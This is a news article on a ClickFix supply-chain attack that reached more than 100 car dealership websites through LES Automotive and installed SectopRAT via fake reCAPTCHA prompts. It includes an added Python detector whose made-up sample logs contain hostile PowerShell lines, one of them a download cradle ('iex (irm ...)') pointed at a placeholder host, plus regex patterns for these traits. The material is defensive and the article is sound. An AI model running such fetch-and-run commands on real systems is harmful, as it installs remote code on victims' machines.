Massive Supply Chain Attack Infects Auto Dealerships


A recent supply chain attack compromised more than 100 car dealership websites after cybercriminals infiltrated a third-party domain and embedded malicious ClickFix code in it.

The breach targeted LES Automotive, a shared video service widely used by car dealerships. Cybercriminals injected ClickFix malware, redirecting visitors to a deceptive webpage designed to manipulate them into executing harmful commands.

How the ClickFix Attack Works

ClickFix operates by embedding malicious scripts into a website. These scripts generate fake prompts asking users to fix an error or complete a reCAPTCHA challenge to verify their identity.

Once the user clicks on the prompt, a malicious command is copied to the clipboard. The page then instructs them to open the Windows Run prompt, paste the command, and execute it, unknowingly infecting their device.
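The execution chain described above leaves a distinctive footprint on the endpoint: a command pasted into the Run dialog is spawned directly by explorer.exe, and ClickFix payloads typically hide the window, bypass policy, or pull code from a remote host. The following detection logic is an added example, not part of the original article; the Sysmon-style process-creation records it scans are constructed samples.

```python
import re

# Constructed Sysmon-style process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    'ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine=powershell -w hidden -c "iex (irm http://example.invalid/verify)"',
    'ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine=powershell -NoP -Ep Bypass -EncodedCommand SQBFAFgA',
    'ParentImage=C:\\Windows\\System32\\cmd.exe Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine=powershell -File C:\\scripts\\backup.ps1',
    'ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\notepad.exe '
    'CommandLine=notepad.exe notes.txt',
]

EVENT_RE = re.compile(r'ParentImage=(?P<parent>\S+) Image=(?P<image>\S+) CommandLine=(?P<cmd>.*)')

# Interpreters a pasted Run-dialog command typically lands in.
SHELLS = ('powershell.exe', 'pwsh.exe', 'cmd.exe', 'mshta.exe')

# Command-line traits common to ClickFix payloads: hide the window, skip
# execution policy, fetch-and-run remote code, or wrap the command in base64.
INDICATORS = {
    'hidden window': re.compile(r'-w(?:indowstyle)?\s+hidden', re.I),
    'encoded command': re.compile(r'-e(?:nc|ncodedcommand)?(?=\s)', re.I),
    'execution policy bypass': re.compile(r'-e(?:xecution)?p(?:olicy)?\s+bypass', re.I),
    'download cradle': re.compile(
        r'\b(?:iex|invoke-expression)\b.*\b(?:irm|iwr|invoke-webrequest|invoke-restmethod|downloadstring)\b', re.I),
}

def analyze(events):
    """Return one alert per event matching the ClickFix execution pattern:
    a shell spawned directly by explorer.exe (as the Run dialog does) whose
    command line carries at least one suspicious indicator."""
    alerts = []
    for line in events:
        m = EVENT_RE.match(line)
        if not m:
            continue  # malformed record; skip rather than guess
        parent = m['parent'].rsplit('\\', 1)[-1].lower()
        image = m['image'].rsplit('\\', 1)[-1].lower()
        if parent != 'explorer.exe' or image not in SHELLS:
            continue
        hits = [name for name, rx in INDICATORS.items() if rx.search(m['cmd'])]
        if hits:
            alerts.append({'image': image, 'indicators': hits, 'command': m['cmd']})
    return alerts

if __name__ == '__main__':
    for alert in analyze(SAMPLE_EVENTS):
        print(f"ALERT {alert['image']}: {', '.join(alert['indicators'])} :: {alert['command']}")
```

Correlating the explorer.exe-to-shell parent relationship with the RunMRU registry key or clipboard events reduces false positives from administrators who legitimately launch hidden PowerShell from scheduled tasks or cmd.exe, which this filter already excludes.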

This social engineering technique has existed for several years but has recently gained popularity among cybercriminals and advanced persistent threat (APT) groups. Security experts have observed a significant surge in its adoption.

In October 2024, the U.S. Department of Health and Human Services (HHS) warned that Russian-speaking cybercriminals had been leveraging ClickFix since at least April 2024. Meanwhile, these attackers actively distributed information stealers and other malware variants across multiple industries.

Most recently, Microsoft raised alarms over a ClickFix malware campaign targeting the hospitality sector.

SectopRAT Deployment via Car Dealership Websites

Cybersecurity researcher Randy McEoin uncovered that more than 100 auto dealership websites using LES Automotive were infected with ClickFix. The aim was to deploy SectopRAT malware to unsuspecting visitors.

The attack utilized a fake reCAPTCHA interface, tricking users into running PowerShell commands that installed the remote access trojan (RAT). This allowed hackers to gain full control over infected systems, posing a severe cybersecurity risk.

McEoin’s analysis revealed that the JavaScript responsible for the attack contained Russian-language comments—a potential clue about the origins of the threat actors behind this campaign.

Additionally, evidence suggests that the malware was injected dynamically, which means that some users received a harmless version of the script, while others were served the malicious payload.

This incident underscores the escalating risks of supply chain attacks, where a single compromised vendor can expose hundreds of businesses and thousands of users to cyber threats.

As cybercriminals refine their tactics, businesses must adopt stronger security measures, including regular software audits, network monitoring, and enhanced user awareness to mitigate risks associated with these sophisticated attacks.
